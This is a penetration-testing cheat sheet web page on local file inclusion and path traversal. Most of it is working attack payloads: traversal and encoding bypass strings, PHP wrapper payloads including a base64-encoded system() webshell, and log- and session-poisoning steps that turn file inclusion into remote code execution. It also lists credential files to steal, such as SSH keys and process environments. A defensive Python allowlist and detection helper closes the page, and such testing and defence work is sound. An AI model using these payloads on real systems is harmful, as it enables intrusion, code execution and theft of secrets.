CyberCheatsheets

LFI / Path Traversal Cheat Sheet

Local file inclusion and directory traversal payloads, PHP wrappers, and log-poisoning RCE for authorized testing.

Category: Web Application Security · Tags: lfi, owasp, path-traversal, rfi, web · Updated 2026-06-17

Overview

Local File Inclusion (LFI) and path traversal occur when an app builds a file path from user input without sanitization, letting you read files outside the intended directory—or, with PHP, escalate to code execution via wrappers and log poisoning. Test any parameter that looks like a filename, page, template, or language.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Basic traversal

Linux — climb out and read passwd

../../../../etc/passwd

Windows equivalent

..\..\..\..\windows\win.ini

Absolute path (when the app prepends nothing)

/etc/passwd

Bypass naive single-pass ../ stripping

....//....//....//etc/passwd

Filter bypasses

URL-encode the slashes

..%2f..%2f..%2fetc%2fpasswd

Double URL-encode (decoded twice)

..%252f..%252f..%252fetc%252fpasswd

Null byte to truncate an appended extension (PHP < 5.3.4)

../../../etc/passwd%00

Mixed-slash variant

....\/....\/etc/passwd

PHP wrappers (read source)

Base64-encode source so PHP isn't executed — decode to read it

php://filter/convert.base64-encode/resource=index.php

ROT13 variant when base64 is filtered

php://filter/read=string.rot13/resource=config.php

data:// wrapper → RCE (decodes to a system() webshell)

data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWzBdKTs/Pg==

Requires allow_url_include=On.

Direct command execution if the expect extension is loaded

expect://id

LFI to RCE: log poisoning

1) Poison the access log via a malicious User-Agent

curl http://target/ -A '<?php system($_GET["c"]); ?>'

2) Include the poisoned log and run a command

http://target/?page=/var/log/apache2/access.log&c=id

Alternative: poison the SSH auth log via a crafted username

ssh '<?php system($_GET[0]); ?>'@target

Then include it

http://target/?page=/var/log/auth.log&0=id

PHP session & wrapper RCE

POST the PHP payload as the body (page=php://input)

php://input

Send <?php system('id'); ?> in the request body. Like data://, including php://input requires allow_url_include=On.

Include your own session file after injecting PHP into a session value

/var/lib/php/sessions/sess_<PHPSESSID>

High-value files to read

Linux users and (sometimes) service hints

/etc/passwd

App config / DB creds

/var/www/html/config.php (read via php://filter base64)

SSH private key

/home/<user>/.ssh/id_rsa

Process environment (tokens, secrets)

/proc/self/environ

Current process cmdline

/proc/self/cmdline

Tips

  • Always try php://filter base64 first on .php targets — it reveals source (and creds) without executing.
  • /proc/self/environ and /proc/self/fd/* are great LFI-to-RCE and info-leak primitives.
  • Wordlists like LFI-Jhaddix.txt + ffuf automate finding the right traversal depth.
  • Fix = a strict allowlist of file names and basename() — never pass user input to include().
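Added example, not code from this cheat sheet: a Python version of the allowlist + basename() fix from the last tip, paired with a detection helper that flags the encoded, double-encoded, null-byte, mixed-slash, absolute-path and wrapper variants listed in the sections above. ALLOWED_PAGES and the base directory are assumed values for a hypothetical app whose ?page= parameter selects a template.

```python
import os
import re
from typing import Optional
from urllib.parse import unquote

# Constructed allowlist for a hypothetical app whose ?page= parameter selects a template.
ALLOWED_PAGES = {"home", "about", "contact"}

# Matches stream wrappers such as php://, data://, expect:// at the start of the value.
WRAPPER_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable, so %252f (double-encoded '/') is seen as '/'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal_attempt(value: str) -> bool:
    """Detection view: flag dot-dot segments, null bytes, wrappers and absolute paths.

    The ....// and ....\\/ variants are caught because any segment containing '..'
    is treated as suspicious; that can flag odd but legitimate names, which is
    acceptable for a WAF or log rule (the resolver below relies on the allowlist).
    """
    decoded = decode_fully(value)
    if "\x00" in decoded or WRAPPER_RE.match(decoded):
        return True
    normalized = decoded.replace("\\", "/")
    if normalized.startswith("/"):
        return True
    return any(".." in segment for segment in normalized.split("/"))


def resolve_page(page_param: str, base_dir: str) -> Optional[str]:
    """Mitigation view: real path of an allowlisted page under base_dir, else None."""
    if is_traversal_attempt(page_param):
        return None
    name = os.path.basename(decode_fully(page_param))  # drop any directory component
    if name not in ALLOWED_PAGES:
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name + ".php"))
    # Containment check: even an allowlisted name must resolve inside base_dir.
    if os.path.commonpath([base, target]) != base:
        return None
    return target
```

The app then includes only the path resolve_page() returns and treats None as a 404; the raw parameter never reaches include().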
